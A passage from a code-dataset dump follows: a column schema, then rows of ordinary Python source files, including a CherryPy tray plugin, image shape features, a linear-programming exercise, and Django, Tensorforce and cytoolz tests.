blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c9b9126eb7cfe8ea67cc1dd7bf1da71936a45f80 | 5f4adc8c51f9b7dd67a47f37eaf31e8ddb066f71 | /core/cp_plugins/systray.py | 9fc45cfcbb597ecc1d8dd71abfc8c312a66c380d | [
"Apache-2.0"
] | permissive | cryorooster/watcher | 1a4f186cb9d0a0c84f80e30073b313a0bd049995 | 0dd25241a01d7dcb9ffcd312cc2472b2c9cb2983 | refs/heads/master | 2021-01-23T04:45:09.272825 | 2017-02-05T23:36:39 | 2017-02-05T23:36:49 | 80,380,818 | 0 | 0 | null | 2017-01-29T23:39:16 | 2017-01-29T23:39:15 | null | UTF-8 | Python | false | false | 2,563 | py | import logging
import sys
import webbrowser
import cherrypy
import core
from cherrypy.process import plugins
from infi.systray import SysTrayIcon
logging = logging.getLogger(__name__)
class SysTrayPlugin(plugins.SimplePlugin):
'''
CherryPy plugin that creates a system tray icon for Windows.
Because SysTrayIcon always fires off on_quit, we can't have on_quit
execute cherrypy.engine.exit() if the exit command is what triggered
SysTrayIcon to close. So conditions are set to only fire on_quit when
the quit_method == 'menu'.
This way, when the menu option is called, it destroys SysTrayIcon then
closes cherrypy. Cherrypy will try to close SysTrayIcon by calling
stop(), so stop() gets reassigned to None.
If the app is closed by cherrypy (whether catching a kb interrupt or the GUI
shutdown button), cherrypy stops the plugin by calling stop(). Stop()
reassigns SysTrayIcon._on_quit to None and calls SysTrayIcon.shutdown().
SysTrayIcon is then destroyed (twice for reasons I can't figure out),
then cherrypy finishes up the engine.stop() and engine.exit().
The chain is as such:
Trigger == systray menu 'Quit':
SysTrayIcon._destroy() >
SysTrayIcon._on_quit() > set SysTrayPlugin.quit_method = 'menu'
cherrypy.engine.exit() >
SysTrayPlugin.stop() > does nothing
sys.exit()
Trigger == KBInterrupt or GUI Shutdown:
cherrypy.engine.stop() >
SysTrayPlugin.stop() > disable SysTrayIcon._on_quit()
SysTrayIcon.shutdown() >
SysTrayIcon._destroy() >
SysTrayIcon._destroy() >
cherrypy.engine.exit() >
sys.exit()
'''
def __init__(self, bus):
plugins.SimplePlugin.__init__(self, bus)
menu_options = (('Open Browser', None, self.open),)
self.systray = SysTrayIcon('core/favicon.ico', 'Watcher',
menu_options, on_quit=self.on_quit)
self.quit_method = None
return
def start(self):
self.systray.start()
return
def stop(self):
if self.quit_method == 'menu':
return
else:
self.systray._on_quit = None
self.systray.shutdown()
return
def on_quit(self, systray):
self.quit_method = 'menu'
cherrypy.engine.exit()
sys.exit(0)
# sys tray functions:
def open(self, systray):
webbrowser.open('http://{}:{}{}'.format(
core.SERVER_ADDRESS, core.SERVER_PORT, core.URL_BASE))
return
| [
"[email protected]"
] | |
5faff836f01be1ca229e5d45ff91386da1400121 | bc7cd6689a8052d442ded8e876de1e5f22bfad6c | /lsml/feature/provided/shape.py | c4f910d38d3f18cbd76060977e01cb6f94890147 | [
"BSD-3-Clause"
] | permissive | tor4z/level-set-machine-learning | 3a359e0d55137f3c0a9cbcaf25048c61573abd25 | 38460e514d48f3424bb8d3bd58cb3eb330153e64 | refs/heads/master | 2022-04-08T08:04:27.200188 | 2020-01-26T03:09:56 | 2020-01-26T03:09:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,052 | py | import numpy
from skimage.measure import marching_cubes_lewiner as marching_cubes
from skimage.measure import find_contours, mesh_surface_area
from lsml.feature.base_feature import (
BaseShapeFeature, GLOBAL_FEATURE_TYPE, LOCAL_FEATURE_TYPE)
class Size(BaseShapeFeature):
""" Computes the size of the region enclosed by the zero level set of u.
In 1D, this is length. In 2D, it is area, and in 3D, it is volume.
"""
locality = GLOBAL_FEATURE_TYPE
@property
def name(self):
if self.ndim == 1:
return 'Length'
elif self.ndim == 2:
return 'Area'
elif self.ndim == 3:
return 'Volume'
else:
return 'Hyper-volume'
def compute_feature(self, u, dist, mask, dx):
size = (u > 0).sum() * numpy.prod(dx)
feature = numpy.empty_like(u)
feature[mask] = size
return feature
class BoundarySize(BaseShapeFeature):
""" Computes the size of the zero-level set of u. In 2D, this is
the length of the implicit curve. In 3D, it is surface area.
"""
locality = GLOBAL_FEATURE_TYPE
def __init__(self, ndim=2):
if ndim < 2 or ndim > 3:
msg = ("Boundary size is only defined for dimensions 2 and 3; "
"ndim provided = {}")
raise ValueError(msg.format(ndim))
super(BoundarySize, self).__init__(ndim)
@property
def name(self):
if self.ndim == 2:
return 'Curve length'
elif self.ndim == 3:
return 'Surface area'
def compute_feature(self, u, dist, mask, dx):
feature = numpy.empty_like(u)
if self.ndim == 2:
boundary_size = self._compute_arc_length(u, dx)
elif self.ndim == 3:
boundary_size = self._compute_surface_area(u, dx)
else:
msg = "Cannot compute boundary size for ndim = {}"
raise RuntimeError(msg.format(self.ndim))
feature[mask] = boundary_size
return feature
def _compute_arc_length(self, u, dx):
contours = find_contours(u, 0)
total_arc_length = 0.
for contour in contours:
closed_contour = numpy.vstack((contour, contour[0]))
closed_contour *= dx[::-1] # find_contours points in index space
arc_length = numpy.linalg.norm(numpy.diff(closed_contour, axis=0),
axis=1).sum()
total_arc_length += arc_length
return total_arc_length
def _compute_surface_area(self, u, dx):
verts, faces, _, _ = marching_cubes(u, 0., spacing=dx)
return mesh_surface_area(verts, faces)
class IsoperimetricRatio(BaseShapeFeature):
""" Computes the isoperimetric ratio, which is a measure of
circularity in two dimensions and a measure of sphericity in three.
In both cases, the maximum ratio value of 1 is achieved only for
a perfect circle or sphere.
"""
locality = GLOBAL_FEATURE_TYPE
@property
def name(self):
if self.ndim == 2:
return 'Circularity'
else:
return 'Sphericity'
def __init__(self, ndim=2):
if ndim < 2 or ndim > 3:
msg = ("Isoperimetric ratio defined for dimensions 2 and 3; "
"ndim provided = {}")
raise ValueError(msg.format(ndim))
super(IsoperimetricRatio, self).__init__(ndim)
def compute_feature(self, u, dist, mask, dx):
if self.ndim == 2:
return self.compute_feature2d(
u=u, dist=dist, mask=mask, dx=dx)
else:
return self.compute_feature3d(
u=u, dist=dist, mask=mask, dx=dx)
def compute_feature2d(self, u, dist, mask, dx):
# Compute the area
size = Size(ndim=2)
area = size.compute_feature(u=u, dist=dist, mask=mask, dx=dx)
# Compute the area
boundary_size = BoundarySize(ndim=2)
curve_length = boundary_size.compute_feature(
u=u, dist=dist, mask=mask, dx=dx)
feature = numpy.empty_like(u)
feature[mask] = 4*numpy.pi*area[mask] / curve_length[mask]**2
return feature
def compute_feature3d(self, u, dist, mask, dx):
# Compute the area
size = Size(ndim=3)
volume = size(u=u, dist=dist, mask=mask, dx=dx)
# Compute the area
boundary_size = BoundarySize(ndim=3)
surface_area = boundary_size(u=u, dist=dist, mask=mask, dx=dx)
feature = numpy.empty_like(u)
feature[mask] = 36*numpy.pi*volume[mask]**2 / surface_area[mask]**3
return feature
class Moments(BaseShapeFeature):
""" Computes the normalized statistical moments of a given order along
a given axis
"""
locality = GLOBAL_FEATURE_TYPE
@property
def name(self):
return "Moments (axes={}; orders={})".format(self.axes, self.orders)
@property
def size(self):
return len(self.axes) * len(self.orders)
def __init__(self, ndim=2, axes=(0, 1), orders=(1, 2)):
""" Initialize a normalized statistical moment feature
ndim: int
Number of dimensions
axes: list[int], default=[0, 1]
The axes along which the moment should be computed
order: list[int], default=[1, 2]
The orders of the moments, e.g., order=1 yields the 'center of
mass' coordinate along the given axis and order=2 yields a measure
of spread along the given axis
"""
super(Moments, self).__init__(ndim)
for axis in axes:
if axis < 0 or axis > ndim-1:
msg = "axis provided ({}) must be one of 0 ... {}"
raise ValueError(msg.format(axis, ndim-1))
for order in orders:
if order < 1:
msg = "Moments order should be greater than or equal to 1"
raise ValueError(msg)
self.axes = axes
self.orders = orders
def _compute_center_of_mass(self, u, dx):
# Initialize center of mass container and mask with singular entry
center_of_mass = numpy.zeros(self.ndim)
mask = numpy.empty(u.shape, dtype=numpy.bool)
mask.ravel()[0] = True
for i in range(self.ndim):
center_of_mass[i] = self._compute_moment(
u=u, dist=u, mask=mask, dx=dx, axis=i, order=1)
return center_of_mass
def _compute_moment(self, u, dist, mask, dx, axis, order):
""" Computes the feature for just a single axis and order """
indices = numpy.indices(u.shape, dtype=numpy.float)
mesh = indices[axis] * dx[axis]
size = Size(ndim=self.ndim)
# Normalize by centering if order is greater than 1
if order > 1:
center_of_mass = self._compute_center_of_mass(u=u, dx=dx)
mesh -= center_of_mass[axis]
measure = size(u=u, dist=dist, mask=mask, dx=dx)[mask].ravel()[0]
moment = (mesh**order)[u > 0].sum() * numpy.prod(dx) / measure
return moment
def compute_feature(self, u, dist, mask, dx):
from itertools import product
features = numpy.empty(u.shape + (self.size,))
for i, (axis, order) in enumerate(product(self.axes, self.orders)):
features[mask, i] = self._compute_moment(
u, dist, mask, dx, axis, order)
return features
class DistanceToCenterOfMass(BaseShapeFeature):
""" Computes the distance to the computed center of mass
"""
locality = LOCAL_FEATURE_TYPE
@property
def name(self):
return "Distance to center of mass"
def compute_feature(self, u, dist, mask, dx):
# Sneakily use the center of mass utility buried in the
# moment feature class
moment_feature = Moments(ndim=self.ndim)
center_of_mass = moment_feature._compute_center_of_mass(u, dx)
# Add extra axes for some broadcasting below
slicer = tuple([slice(None), ] + [None for _ in range(self.ndim)])
indices = numpy.indices(u.shape, dtype=numpy.float)
mesh = indices * dx[slicer]
feature = numpy.empty_like(u)
feature[mask] = numpy.linalg.norm(
mesh - center_of_mass[slicer], axis=0)[mask]
return feature
def get_basic_shape_features(ndim=2, moment_orders=[1, 2]):
""" Generate a list of basic shape features at multiple sigma values
Parameters
----------
ndim : int, default=2
The number of dimension of the image to which these features
will be applied
moment_orders : list[float], default=[1, 2]
Orders for which we compute moments
Returns
-------
features : list[BaseImageFeature]
A list of image feature instances
"""
feature_classes = [
BoundarySize,
DistanceToCenterOfMass,
IsoperimetricRatio,
Moments,
Size,
]
return [
feature_class(ndim=ndim)
for feature_class in feature_classes
]
| [
"[email protected]"
] | |
f62998c30aabd3f2ae38cf6aa13b33f4456ef7e1 | d0fe389bae13abfc9d666dc880c50b894b7c212d | /software/tool/test_pipeline/move_file.py | 5fd75b3eebadef6c39cadc438cc9d2d6974eda57 | [] | no_license | ab3nd/TinyRobo | 965c060e95ef6446a609b4954dda042d1ff16311 | b86d2f716fea4bcc420f81e1903484554fb33b51 | refs/heads/master | 2020-04-12T08:49:45.086755 | 2019-07-11T01:59:05 | 2019-07-11T01:59:05 | 39,583,602 | 7 | 2 | null | 2018-07-10T20:05:36 | 2015-07-23T18:17:14 | Jupyter Notebook | UTF-8 | Python | false | false | 819 | py | #!/usr/bin/python
#Get a file that starts with "recognizer_test" in the ~/.ros/ directory, and move it to a new directory
import json
import rosbag
import rospy
import os
import fnmatch
import yaml
#From https://stackoverflow.com/questions/1724693/find-a-file-in-python
def find(pattern, path):
result = []
for root, dirs, files in os.walk(path):
for name in files:
if fnmatch.fnmatch(name, pattern):
result.append(os.path.join(root, name))
return result
path = "/home/ams/.ros"
pattern = "recognizer_test*"
#Get the files
files = find(pattern, path)
#Because the file names contains dates, this should more or less get the oldest one
oldName = sorted(files)[0]
#Move it to an appropriately named directory
os.renames(oldName, "test_{0}/{0}_{0}.bag".format('foo')) | [
"[email protected]"
] | |
c55812681bffcd67f705310e9d3133f402e043f6 | 9d8a3a2c0a15dbf1f90d801e6d705d1212cf09af | /services/web__morningstaronline_co_uk.py | ac5fc53d8d59be5e0045ca7297f649f07c83b74c | [] | no_license | rudolphos/NewsGrabber | f9bddc9a9b3a9e02f716133fd746f48cee635b36 | 86354fb769b2710ac7cdd5bd8795e43158b70ad2 | refs/heads/master | 2021-01-12T12:07:55.335079 | 2016-10-09T22:39:17 | 2016-10-09T22:39:17 | 72,316,773 | 0 | 0 | null | 2016-10-30T00:35:08 | 2016-10-30T00:35:08 | null | UTF-8 | Python | false | false | 417 | py | refresh = 5
version = 20160312.01
urls = ['https://www.morningstaronline.co.uk/britain',
'https://www.morningstaronline.co.uk/world',
'https://www.morningstaronline.co.uk/editorial',
'https://www.morningstaronline.co.uk/features',
'https://www.morningstaronline.co.uk/sport',
'https://www.morningstaronline.co.uk/arts']
regex = [r'^https?:\/\/[^\/]*morningstaronline\.co\.uk']
videoregex = []
liveregex = []
| [
"[email protected]"
] | |
040bb40356755d5212e78b84510e1694a8c54de4 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03211/s451237439.py | f9efa41c7796ee9c183843e22d4cccb747349d8b | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | s =input()
m = 100000
for i in range(len(s)-2):
a=(s[i:i+3])
m=min(abs(753-int(a)),m)
print(m) | [
"[email protected]"
] | |
207bee7e203e906fc119bb7df61d83adcdec1d35 | d49f28ea7867cf9ce9512c0521b136934e97b7d2 | /tests/backends/base/test_client.py | 4573bbe97bfb174d2998b800e8ce5e119a7d4da8 | [
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-other-permissive",
"Python-2.0"
] | permissive | tamirverthim/django | cdbc198a055deeb526caff6b18ae874445f217c5 | 666b7048a0dc6b067c1e3f58653f3c7ca00371a2 | refs/heads/master | 2023-04-14T00:51:11.507226 | 2020-12-07T12:19:20 | 2020-12-07T12:19:20 | 319,310,225 | 0 | 0 | BSD-3-Clause | 2023-04-03T23:53:00 | 2020-12-07T12:17:41 | Python | UTF-8 | Python | false | false | 605 | py | from django.db import connection
from django.db.backends.base.client import BaseDatabaseClient
from django.test import SimpleTestCase
class SimpleDatabaseClientTests(SimpleTestCase):
def setUp(self):
self.client = BaseDatabaseClient(connection=connection)
def test_settings_to_cmd_args_env(self):
msg = (
'subclasses of BaseDatabaseClient must provide a '
'settings_to_cmd_args_env() method or override a runshell().'
)
with self.assertRaisesMessage(NotImplementedError, msg):
self.client.settings_to_cmd_args_env(None, None)
| [
"[email protected]"
] | |
bd889e11569d36e3109b85c5a0a51fcde69bafc1 | 14a853584c0c1c703ffd8176889395e51c25f428 | /sem1/csa/project-euler/1/1.py | 2781f342cd824654222ed7b2a8bc9e4e36f07637 | [] | no_license | harababurel/homework | d0128f76adddbb29ac3d805c235cdedc9af0de71 | 16919f3b144de2d170cd6683d54b54bb95c82df9 | refs/heads/master | 2020-05-21T12:25:29.248857 | 2018-06-03T12:04:45 | 2018-06-03T12:04:45 | 43,573,199 | 6 | 4 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | print(sum([x for x in range(1, 100000001) if x % 3 == 0 or x % 5 == 0]))
| [
"[email protected]"
] | |
760d04f4f37ec49446c5810324797d3ef73de59c | c947a71a16ed180c920d4b362347f980d93bd2fe | /src/Classes/MSDS400/Module 3/workout.py | c7f40dafdf59f5c1f52238d5010dc1fa5ddcbc10 | [
"MIT"
] | permissive | bmoretz/Python-Playground | b69cac015e95d97f46ebd678c4493a44befb556f | a367ec7659b85c24363c21b5c0ac25db08ffa1f6 | refs/heads/master | 2021-05-13T23:35:31.986884 | 2019-11-23T19:07:58 | 2019-11-23T19:07:58 | 116,520,816 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,542 | py | # As part of a weight reduction program, a man designs a monthly exercise program consisting of bicycling, jogging, and swimming.
# He would like to
# exercise at most 28 hours,
# devote at most 6 hours to swimming,
# and jog for no more than the total number of hours bicycling and swimming.
# The calories burned by this person per hour by bicycling, jogging, and swimming are 200, 427, and 283, respectively.
# How many hours should be allotted to each activity to maximize the number of calories burned? What is the maximum number of calories he will burn?
# (Hint: Write the constraint involving jogging in the form less than or equals 0.)
# Let x 1 be the number of hours spent bicycling,
# let x 2 be the number of hours spent jogging,
# and let x 3 be the number of hours spent swimming.
#
# What is the objective function?
from pulp import *
workout = LpProblem( "Workout Problem", LpMaximize )
x1 = LpVariable( "x1", 0 ) # Bicycling
x2 = LpVariable( "x2", 0 ) # Jogging
x3 = LpVariable( "x3", 0 ) # Swimming
w = LpVariable( "w" )
workout += 200*x1 + 427*x2 + 283*x3
# Constraints
workout += x1 + x2 + x3 <= 28 # no more than total hours
workout += x3 <= 6 # at most hours swimming
workout += x2 <= x1 + x3 # jog no more than Bicycling + Swimming
workout.solve()
workout.LpStatus[ workout.status ]
for variable in workout.variables():
print("{0} = {1}".format( variable.name, variable.varValue ))
print( 'Optimal Sln: {0}'.format(pulp.value( workout.objective ))) | [
"[email protected]"
] | |
f0365d989dd7c876fa5c7fca77f76477b90906d6 | 44baa6621306c6b9810db48b3c1479cb8db294b3 | /test/test_summaries.py | 890a49aaf4ebb8b1bd8020b972c18679946c46be | [
"Apache-2.0"
] | permissive | codeninja/tensorforce | ecc216e2970194d086209fb726fc64b4b9cd8e93 | 212b115d10a21b8241e1d9df56c4851ffd370f34 | refs/heads/master | 2020-08-13T08:16:11.046478 | 2019-10-18T17:36:03 | 2019-10-18T17:36:03 | 214,937,969 | 2 | 0 | Apache-2.0 | 2019-10-18T17:36:04 | 2019-10-14T03:15:34 | Python | UTF-8 | Python | false | false | 2,058 | py | # Copyright 2018 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import unittest
from test.unittest_base import UnittestBase
class TestSummaries(UnittestBase, unittest.TestCase):
exclude_bounded_action = True # TODO: shouldn't be necessary!
require_observe = True
directory = 'test-summaries'
def test_summaries(self):
# FEATURES.MD
self.start_tests()
# 'dropout', 'kl-divergence'
reward_estimation = dict(horizon=2, estimate_horizon='late')
baseline_policy = dict(network=dict(type='auto', size=8, internal_rnn=1))
baseline_objective = 'policy_gradient'
baseline_optimizer = 'adam'
self.unittest(
summarizer=dict(directory=self.__class__.directory, labels='all', frequency=2),
reward_estimation=reward_estimation, baseline_policy=baseline_policy,
baseline_objective=baseline_objective, baseline_optimizer=baseline_optimizer
)
for directory in os.listdir(path=self.__class__.directory):
directory = os.path.join(self.__class__.directory, directory)
for filename in os.listdir(path=directory):
os.remove(path=os.path.join(directory, filename))
assert filename.startswith('events.out.tfevents.')
break
os.rmdir(path=directory)
os.rmdir(path=self.__class__.directory)
self.finished_test()
| [
"[email protected]"
] | |
b0dcde257cf60b3ff95c8d677121bbedec3ea846 | 1dacbf90eeb384455ab84a8cf63d16e2c9680a90 | /pkgs/cytoolz-0.7.5-py27_0/lib/python2.7/site-packages/cytoolz/tests/test_none_safe.py | 62f6280f931530d908a7249f648b54df00f1d677 | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown"
] | permissive | wangyum/Anaconda | ac7229b21815dd92b0bd1c8b7ec4e85c013b8994 | 2c9002f16bb5c265e0d14f4a2314c86eeaa35cb6 | refs/heads/master | 2022-10-21T15:14:23.464126 | 2022-10-05T12:10:31 | 2022-10-05T12:10:31 | 76,526,728 | 11 | 10 | Apache-2.0 | 2022-10-05T12:10:32 | 2016-12-15T05:26:12 | Python | UTF-8 | Python | false | false | 11,403 | py | """ Test that functions are reasonably behaved with None as input.
Typed Cython objects (like dict) may also be None. Using functions from
Python's C API that expect a specific type but receive None instead can cause
problems such as throwing an uncatchable SystemError (and some systems may
segfault instead). We obviously don't what that to happen! As the tests
below discovered, this turned out to be a rare occurence. The only changes
required were to use `d.copy()` instead of `PyDict_Copy(d)`, and to always
return Python objects from functions instead of int or bint (so exceptions
can propagate).
The vast majority of functions throw TypeError. The vast majority of
functions also behave the same in `toolz` and `cytoolz`. However, there
are a few minor exceptions. Since passing None to functions are edge cases
that don't have well-established behavior yet (other than raising TypeError),
the tests in this file serve to verify that the behavior is at least
reasonably well-behaved and don't cause SystemErrors.
"""
# XXX: This file could be back-ported to `toolz` once unified testing exists.
import cytoolz
from cytoolz import *
from cytoolz.utils import raises
from operator import add
class GenException(object):
def __init__(self, exc):
self.exc = exc
def __iter__(self):
return self
def __next__(self):
raise self.exc
def next(self):
raise self.exc
def test_dicttoolz():
tested = []
assert raises((TypeError, AttributeError), lambda: assoc(None, 1, 2))
tested.append('assoc')
assert raises((TypeError, AttributeError), lambda: dissoc(None, 1))
tested.append('dissoc')
# XXX
assert (raises(TypeError, lambda: get_in(None, {})) or
get_in(None, {}) is None)
assert raises(TypeError, lambda: get_in(None, {}, no_default=True))
assert get_in([0, 1], None) is None
assert raises(TypeError, lambda: get_in([0, 1], None, no_default=True))
tested.append('get_in')
assert raises(TypeError, lambda: keyfilter(None, {1: 2}))
assert raises((AttributeError, TypeError), lambda: keyfilter(identity, None))
tested.append('keyfilter')
# XXX
assert (raises(TypeError, lambda: keymap(None, {1: 2})) or
keymap(None, {1: 2}) == {(1,): 2})
assert raises((AttributeError, TypeError), lambda: keymap(identity, None))
tested.append('keymap')
assert raises(TypeError, lambda: merge(None))
assert raises((TypeError, AttributeError), lambda: merge(None, None))
tested.append('merge')
assert raises(TypeError, lambda: merge_with(None, {1: 2}, {3: 4}))
assert raises(TypeError, lambda: merge_with(identity, None))
assert raises((TypeError, AttributeError),
lambda: merge_with(identity, None, None))
tested.append('merge_with')
assert raises(TypeError, lambda: update_in({1: {2: 3}}, [1, 2], None))
assert raises(TypeError, lambda: update_in({1: {2: 3}}, None, identity))
assert raises((TypeError, AttributeError),
lambda: update_in(None, [1, 2], identity))
tested.append('update_in')
assert raises(TypeError, lambda: valfilter(None, {1: 2}))
assert raises((AttributeError, TypeError), lambda: valfilter(identity, None))
tested.append('valfilter')
# XXX
assert (raises(TypeError, lambda: valmap(None, {1: 2})) or
valmap(None, {1: 2}) == {1: (2,)})
assert raises((AttributeError, TypeError), lambda: valmap(identity, None))
tested.append('valmap')
assert (raises(TypeError, lambda: itemmap(None, {1: 2})) or
itemmap(None, {1: 2}) == {1: (2,)})
assert raises((AttributeError, TypeError), lambda: itemmap(identity, None))
tested.append('itemmap')
assert raises(TypeError, lambda: itemfilter(None, {1: 2}))
assert raises((AttributeError, TypeError), lambda: itemfilter(identity, None))
tested.append('itemfilter')
s1 = set(tested)
s2 = set(cytoolz.dicttoolz.__all__)
assert s1 == s2, '%s not tested for being None-safe' % ', '.join(s2 - s1)
def test_functoolz():
tested = []
assert raises(TypeError, lambda: complement(None)())
tested.append('complement')
assert compose(None) is None
assert raises(TypeError, lambda: compose(None, None)())
tested.append('compose')
assert raises(TypeError, lambda: curry(None))
tested.append('curry')
assert raises(TypeError, lambda: do(None, 1))
tested.append('do')
assert identity(None) is None
tested.append('identity')
assert raises(TypeError, lambda: juxt(None))
assert raises(TypeError, lambda: list(juxt(None, None)()))
tested.append('juxt')
assert memoize(identity, key=None)(1) == 1
assert memoize(identity, cache=None)(1) == 1
tested.append('memoize')
assert raises(TypeError, lambda: pipe(1, None))
tested.append('pipe')
assert thread_first(1, None) is None
tested.append('thread_first')
assert thread_last(1, None) is None
tested.append('thread_last')
assert flip(lambda a, b: (a, b))(None)(None) == (None, None)
tested.append('flip')
s1 = set(tested)
s2 = set(cytoolz.functoolz.__all__)
assert s1 == s2, '%s not tested for being None-safe' % ', '.join(s2 - s1)
def test_itertoolz():
tested = []
assert raises(TypeError, lambda: list(accumulate(None, [1, 2])))
assert raises(TypeError, lambda: list(accumulate(identity, None)))
tested.append('accumulate')
assert raises(TypeError, lambda: concat(None))
assert raises(TypeError, lambda: list(concat([None])))
tested.append('concat')
assert raises(TypeError, lambda: list(concatv(None)))
tested.append('concatv')
assert raises(TypeError, lambda: list(cons(1, None)))
tested.append('cons')
assert raises(TypeError, lambda: count(None))
tested.append('count')
# XXX
assert (raises(TypeError, lambda: list(drop(None, [1, 2]))) or
list(drop(None, [1, 2])) == [1, 2])
assert raises(TypeError, lambda: list(drop(1, None)))
tested.append('drop')
assert raises(TypeError, lambda: first(None))
tested.append('first')
assert raises(TypeError, lambda: frequencies(None))
tested.append('frequencies')
assert raises(TypeError, lambda: get(1, None))
assert raises(TypeError, lambda: get([1, 2], None))
tested.append('get')
assert raises(TypeError, lambda: groupby(None, [1, 2]))
assert raises(TypeError, lambda: groupby(identity, None))
tested.append('groupby')
assert raises(TypeError, lambda: list(interleave(None)))
assert raises(TypeError, lambda: list(interleave([None, None])))
assert raises(TypeError,
lambda: list(interleave([[1, 2], GenException(ValueError)],
pass_exceptions=None)))
tested.append('interleave')
assert raises(TypeError, lambda: list(interpose(1, None)))
tested.append('interpose')
assert raises(TypeError, lambda: isdistinct(None))
tested.append('isdistinct')
assert isiterable(None) is False
tested.append('isiterable')
assert raises(TypeError, lambda: list(iterate(None, 1)))
tested.append('iterate')
assert raises(TypeError, lambda: last(None))
tested.append('last')
# XXX
assert (raises(TypeError, lambda: list(mapcat(None, [[1], [2]]))) or
list(mapcat(None, [[1], [2]])) == [[1], [2]])
assert raises(TypeError, lambda: list(mapcat(identity, [None, [2]])))
assert raises(TypeError, lambda: list(mapcat(identity, None)))
tested.append('mapcat')
assert raises(TypeError, lambda: list(merge_sorted(None, [1, 2])))
tested.append('merge_sorted')
assert raises(TypeError, lambda: nth(None, [1, 2]))
assert raises(TypeError, lambda: nth(0, None))
tested.append('nth')
assert raises(TypeError, lambda: partition(None, [1, 2, 3]))
assert raises(TypeError, lambda: partition(1, None))
tested.append('partition')
assert raises(TypeError, lambda: list(partition_all(None, [1, 2, 3])))
assert raises(TypeError, lambda: list(partition_all(1, None)))
tested.append('partition_all')
assert raises(TypeError, lambda: list(pluck(None, [[1], [2]])))
assert raises(TypeError, lambda: list(pluck(0, [None, [2]])))
assert raises(TypeError, lambda: list(pluck(0, None)))
tested.append('pluck')
assert raises(TypeError, lambda: reduceby(None, add, [1, 2, 3], 0))
assert raises(TypeError, lambda: reduceby(identity, None, [1, 2, 3], 0))
assert raises(TypeError, lambda: reduceby(identity, add, None, 0))
tested.append('reduceby')
assert raises(TypeError, lambda: list(remove(None, [1, 2])))
assert raises(TypeError, lambda: list(remove(identity, None)))
tested.append('remove')
assert raises(TypeError, lambda: second(None))
tested.append('second')
# XXX
assert (raises(TypeError, lambda: list(sliding_window(None, [1, 2, 3]))) or
list(sliding_window(None, [1, 2, 3])) == [])
assert raises(TypeError, lambda: list(sliding_window(1, None)))
tested.append('sliding_window')
# XXX
assert (raises(TypeError, lambda: list(take(None, [1, 2])) == [1, 2]) or
list(take(None, [1, 2])) == [1, 2])
assert raises(TypeError, lambda: list(take(1, None)))
tested.append('take')
# XXX
assert (raises(TypeError, lambda: list(tail(None, [1, 2])) == [1, 2]) or
list(tail(None, [1, 2])) == [1, 2])
assert raises(TypeError, lambda: list(tail(1, None)))
tested.append('tail')
# XXX
assert (raises(TypeError, lambda: list(take_nth(None, [1, 2]))) or
list(take_nth(None, [1, 2])) == [1, 2])
assert raises(TypeError, lambda: list(take_nth(1, None)))
tested.append('take_nth')
assert raises(TypeError, lambda: list(unique(None)))
assert raises(TypeError, lambda: list(unique([1, 1, 2], key=None)))
tested.append('unique')
assert raises(TypeError, lambda: join(first, None, second, (1, 2, 3)))
assert raises(TypeError, lambda: join(first, (1, 2, 3), second, None))
tested.append('join')
assert raises(TypeError, lambda: topk(None, [1, 2, 3]))
assert raises(TypeError, lambda: topk(3, None))
tested.append('topk')
assert raises(TypeError, lambda: list(diff(None, [1, 2, 3])))
assert raises(TypeError, lambda: list(diff(None)))
assert raises(TypeError, lambda: list(diff([None])))
assert raises(TypeError, lambda: list(diff([None, None])))
tested.append('diff')
assert raises(TypeError, lambda: peek(None))
tested.append('peek')
s1 = set(tested)
s2 = set(cytoolz.itertoolz.__all__)
assert s1 == s2, '%s not tested for being None-safe' % ', '.join(s2 - s1)
def test_recipes():
tested = []
# XXX
assert (raises(TypeError, lambda: countby(None, [1, 2])) or
countby(None, [1, 2]) == {(1,): 1, (2,): 1})
assert raises(TypeError, lambda: countby(identity, None))
tested.append('countby')
# XXX
assert (raises(TypeError, lambda: list(partitionby(None, [1, 2]))) or
list(partitionby(None, [1, 2])) == [(1,), (2,)])
assert raises(TypeError, lambda: list(partitionby(identity, None)))
tested.append('partitionby')
s1 = set(tested)
